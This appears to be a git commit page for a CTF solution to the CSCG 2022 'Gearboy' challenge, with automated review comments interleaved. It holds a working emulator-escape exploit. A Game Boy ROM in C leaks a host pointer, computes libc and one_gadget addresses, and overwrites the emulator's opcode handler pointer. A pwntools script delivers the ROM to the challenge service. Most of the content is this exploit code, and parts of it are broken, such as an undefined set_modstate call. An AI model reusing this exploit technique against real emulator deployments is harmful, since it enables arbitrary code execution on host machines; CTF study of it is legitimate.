cscg22-gearboy

CSCG 2022 Challenge 'Gearboy'

commit 818a0be94c63c6ddfabe108ca49e2c26922fc130
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu, 26 May 2022 02:57:04 +0200

Attempt via memory object

Diffstat:
A.gitignore | 2++
AMakefile | 28++++++++++++++++++++++++++++
Amain.c | 31+++++++++++++++++++++++++++++++
Asolve.py | 42++++++++++++++++++++++++++++++++++++++++++
4 files changed, 103 insertions(+), 0 deletions(-)

diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,2 @@
+main.gb
+main.state
diff --git a/Makefile b/Makefile
@@ -0,0 +1,28 @@
+LCC = ./gbdk/build/gbdk/bin/lcc
+SDCC = ./sdcc/bin/sdcc
+GEARBOY = ./gearboy/platforms/linux/gearboy
+
+.PHONY: all clean run
+
+all: main.gb
+
+clean:
+ rm -f main.gb
+
+$(SDCC):
+ @if [ ! -e Makefile ]; then \
+ cd sdcc && ./configure; \
+ fi
+ make -C sdcc
+
+$(LCC): $(SDCC)
+ SDCCDIR=$(PWD)/sdcc make -C gbdk
+
+main.gb: main.c $(LCC)
+ $(LCC) -o $@ -Wall $< -Wl-yp0x143=0x80
+
+$(GEARBOY):
+ make -C ./gearboy/platforms/linux
+
+run: $(GEARBOY) main.gb
+ $(GEARBOY) main.gb
diff --git a/main.c b/main.c
@@ -0,0 +1,31 @@
+#include "stdint.h"
+
+void
+main(void)
+{
+ volatile static void *memory;
+ volatile static void *processor;
+ volatile static uint64_t op0x00;
+ volatile static uint64_t libc;
+ volatile static uint64_t onegadget;
+ volatile static uint64_t ld_leak;
+
+ /* memory - wrambanks = 0x72840 */
+
+ /* WRAM BANK = -73 */
+ memory = (void*) 0xD7c0;
+
+ /* get leak from heap */
+ ld_leak = *(uint64_t*)(memory + 0x30);
+ libc = ld_leak + 0x127dff0;
+ onegadget = libc + 0xe3afe;
+
+ /* WRAM BANK -13 */
+ *(uint8_t*)(memory + 0x7c) = 0xf3; /* LSB */
+
+ //* ..with new bank, overwrite op 0x00 funcptr */
+ processor = (void*) 0xD960;
+ *(uint64_t*)(processor) = onegadget;
+
+ while (1);
+}
diff --git a/solve.py b/solve.py
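Review bot: The `$(SDCC)` recipe tests `[ ! -e Makefile ]` in the directory make runs from, where this Makefile itself always exists, so the `cd sdcc && ./configure` branch presumably never executes and `make -C sdcc` would run against an unconfigured tree on a fresh checkout. The check was probably meant to look inside the submodule: `@if [ ! -e sdcc/Makefile ]; then \`. The `$(SDCC)` and `$(GEARBOY)` targets also have no prerequisites, so once the binaries exist they are never rebuilt even if the sources change; that may be intentional for vendored trees, but a comment saying so would help.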
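Review bot: `op0x00` is declared in `main` but never read or written, so it should be removed or used; with `-Wall` it is likely to produce an unused-variable warning. The comment before `processor = ...` is written as `//* ... */`, which the `//` turns into a line comment with a stray `*/`, unlike the `/* ... */` form used everywhere else in the file; `/* ..with new bank, overwrite op 0x00 funcptr */` would match. `memory + 0x30` and `memory + 0x7c` are arithmetic on a `void *`, a GNU extension rather than standard C; if the target compiler accepts it, declaring `memory` as `volatile static uint8_t *memory;` would make the byte-offset intent explicit and portable.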
@@ -0,0 +1,42 @@
+#!/usr/bin/env python3
+
+from base64 import b64encode
+from sys import argv,exit
+from pwn import *
+
+context.log_level = "error"
+
+def send(rom, state):
+ #io = process("ncat --ssl 8c83260abb62e95abcc3fdf7-gearboy.challenge.master.cscg.live 31337".split())
+ io = process("ncat localhost 1024".split())
+ io.sendline(b64encode(open(rom, "rb").read()))
+ io.sendline(b64encode(open(state, "rb").read()))
+ data = io.readuntil(b"Got EOF")
+ io.close()
+ return data
+
+def set_wrambanks(filename, index):
+ data = open(filename, "rb").read()
+ data = data[:0x1000] + struct.pack("<i", index) + data[0x1004:]
+ with open(filename, "wb+") as f:
+ f.write(data)
+
+def find_heap_start():
+ search_space = (-256, -90)
+ while search_space[0] + 1 != search_space[1]:
+ testval = (search_space[1] + search_space[0]) // 2
+ print(search_space)
+
+ set_modstate(testval)
+
+ data = send("main.gb", "main.state")
+ if b"exit code 139" in data:
+ search_space = (testval, search_space[1])
+ else:
+ search_space = (search_space[0], testval)
+
+ print("OFFSET", testval)
+
+set_wrambanks("main.gb", -0x37)
+
+print(send("main.gb", "main.state").decode())
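Review bot: `find_heap_start` calls `set_modstate(testval)`, which is not defined anywhere in this file, so the function would raise `NameError` on its first iteration if it were ever called; the module-level code never invokes it, so it is currently dead but broken and should either get a definition or be removed. It also only prints `testval` instead of returning it, so no caller could use the result; `return testval` after the loop would fix that. `send` reads both input files with bare `open(...).read()` and never closes them, and `set_wrambanks` does the same for its read; `with open(rom, "rb") as f: rom_data = f.read()` (and likewise for `state` and `filename`) avoids the leaked handles. `argv` and `exit` are imported but unused, and `struct` is only in scope via `from pwn import *`; an explicit `import struct` would make that dependency visible.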